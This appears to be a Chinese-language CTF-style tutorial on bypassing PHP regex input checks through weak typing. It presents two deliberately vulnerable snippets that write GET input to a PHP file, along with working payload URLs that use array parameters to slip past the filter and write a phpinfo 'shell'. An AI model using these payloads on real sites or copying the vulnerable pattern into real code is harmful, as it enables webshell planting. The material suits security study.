<?php
function is_valid($title, $data)
{
$data = $title . $data;
return preg_match('|\\A\[ _a-zA-Z0-9\]+\\z|is', $data);
}
function write_cache($title, $content)
{
if (!is_valid($title, $content)) {
exit("title or content error");
}
$filename = "1.php";
file\_put\_contents($filename, $content);
}
$title = $_GET\['title'\];
$content = $_GET\['content'\];
write_cache($title,$content);
主要问题还是在于
function is_valid($title, $data)
{
$data = $title . $data;
return preg_match('|\A[ _a-zA-Z0-9]+\z|is', $data);
}
验证函数的弱类型问题 如果正常传入参数,显然是没有问题的 但如果我们传入数组的话: payload:
htt http://localhost/web/trick1/index.php?title=sky&content[]=<?php%20phpinfo();
可以清楚看见
H:\wamp64\www\web\trick1\index.php:5:string 'skyArray' (length=8)
H:\wamp64\www\web\trick1\index.php:16:
array (size=1)
0 => string '<?php phpinfo();,123' (length=20)
此时的数组,传入验证函数里的时候,会变成Array,这样就可以完美的绕过检测了 再看一题:
<?php
$text = $_GET['text'];
if(preg_match('[<>?]', $text)) {
die('error!');
}
file_put_contents('config.php', $text);
此时我们传入payload:
http://localhost/web/trick1/index.php?text=%3C?php%20phpinfo();
会回显:
error!
明显我们的shell被waf拦下了,但如果利用这个弱比较的trick:
http://localhost/web/trick1/index.php?text[]=%3C?php%20phpinfo();
则可以成功写入shell